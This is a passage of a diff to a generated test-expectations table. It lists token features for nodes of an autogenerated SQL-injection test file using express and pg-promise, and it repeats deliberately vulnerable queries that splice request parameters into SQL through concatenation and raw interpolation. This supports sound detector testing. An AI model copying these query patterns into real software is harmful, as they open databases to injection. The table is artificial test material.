autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:26:13:26:22 | req.params | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:26:13:26:22 | req.params | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:26:13:26:22 | req.params | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:26:13:26:25 | req.params.id | CalleeFlexibleAccessPath | db.one | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:26:13:26:25 | req.params.id | InputAccessPathFromCallee | 0.values | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:26:13:26:25 | req.params.id | InputArgumentIndex | 0 | @@ -3648,6 +17977,41 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:26:13:26:25 | req.params.id | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:26:13:26:25 | req.params.id | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:26:13:26:25 | req.params.id | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:26:17:26:22 | params | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:26:17:26:22 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:26:17:26:22 | params | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:26:17:26:22 | params | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:26:17:26:22 | params | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:26:24:26:25 | id | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:26:24:26:25 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:26:24:26:25 | id | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:26:24:26:25 | id | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:26:24:26:25 | id | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:28:3:28:4 | db | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:28:3:28:4 | db | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:28:3:28:4 | db | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:28:3:28:4 | db | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:28:3:28:4 | db | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:28:3:28:8 | db.one | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:28:3:28:8 | db.one | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:28:3:28:8 | db.one | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:28:3:28:8 | db.one | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:28:3:28:8 | db.one | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:28:3:31:4 | db.one( ... er\\n }) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:28:3:31:4 | db.one( ... er\\n }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:28:3:31:4 | db.one( ... er\\n }) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:28:3:31:4 | db.one( ... er\\n }) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:28:3:31:4 | db.one( ... er\\n }) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:28:3:31:4 | exceptional return of db.one( ... er\\n }) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:28:3:31:4 | exceptional return of db.one( ... er\\n }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:28:3:31:4 | exceptional return of db.one( ... er\\n }) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:28:3:31:4 | exceptional return of db.one( ... er\\n }) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:28:3:31:4 | exceptional return of db.one( ... er\\n }) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:28:6:28:8 | one | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:28:6:28:8 | one | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:28:6:28:8 | one | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:28:6:28:8 | one | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:28:6:28:8 | one | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:28:10:31:3 | {\\n t ... ter\\n } | CalleeFlexibleAccessPath | db.one | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:28:10:31:3 | {\\n t ... ter\\n } | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:28:10:31:3 | {\\n t ... ter\\n } | calleeImports | pg-promise | @@ -3657,6 +18021,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:28:10:31:3 | {\\n t ... ter\\n } | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:28:10:31:3 | {\\n t ... ter\\n } | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:28:10:31:3 | {\\n t ... ter\\n } | receiverName | db | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:29:5:29:8 | text | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:29:5:29:8 | text | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:29:5:29:8 | text | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:29:5:29:8 | text | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:29:5:29:8 | text | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:29:5:29:48 | text: ' ... $1:raw' | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:29:5:29:48 | text: ' ... $1:raw' | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:29:5:29:48 | text: ' ... $1:raw' | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:29:5:29:48 | text: ' ... $1:raw' | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:29:5:29:48 | text: ' ... $1:raw' | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:29:5:29:48 | text: ' ... $1:raw' | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:29:5:29:48 | text: ' ... $1:raw' | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:29:5:29:48 | text: ' ... $1:raw' | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:29:5:29:48 | text: ' ... $1:raw' | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:29:5:29:48 | text: ' ... $1:raw' | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:29:11:29:48 | 'SELECT ... $1:raw' | CalleeFlexibleAccessPath | db.one | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:29:11:29:48 | 'SELECT ... $1:raw' | InputAccessPathFromCallee | 0.text | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:29:11:29:48 | 'SELECT ... $1:raw' | InputArgumentIndex | 0 | @@ -3667,6 +18046,31 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:29:11:29:48 | 'SELECT ... $1:raw' | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:29:11:29:48 | 'SELECT ... $1:raw' | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:29:11:29:48 | 'SELECT ... $1:raw' | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:30:5:30:10 | values | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:30:5:30:10 | values | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:30:5:30:10 | values | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:30:5:30:10 | values | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:30:5:30:10 | values | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:30:5:30:25 | values: ... rams.id | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:30:5:30:25 | values: ... rams.id | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:30:5:30:25 | values: ... rams.id | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:30:5:30:25 | values: ... rams.id | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:30:5:30:25 | values: ... rams.id | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:30:5:30:25 | values: ... rams.id | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:30:5:30:25 | values: ... rams.id | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:30:5:30:25 | values: ... rams.id | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:30:5:30:25 | values: ... rams.id | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:30:5:30:25 | values: ... rams.id | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:30:13:30:15 | req | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:30:13:30:15 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:30:13:30:15 | req | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:30:13:30:15 | req | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:30:13:30:15 | req | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:30:13:30:22 | req.params | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:30:13:30:22 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:30:13:30:22 | req.params | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:30:13:30:22 | req.params | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:30:13:30:22 | req.params | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:30:13:30:25 | req.params.id | CalleeFlexibleAccessPath | db.one | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:30:13:30:25 | req.params.id | InputAccessPathFromCallee | 0.values | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:30:13:30:25 | req.params.id | InputArgumentIndex | 0 | @@ -3677,6 +18081,41 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:30:13:30:25 | req.params.id | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:30:13:30:25 | req.params.id | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:30:13:30:25 | req.params.id | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:30:17:30:22 | params | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:30:17:30:22 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:30:17:30:22 | params | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:30:17:30:22 | params | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:30:17:30:22 | params | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:30:24:30:25 | id | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:30:24:30:25 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:30:24:30:25 | id | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db 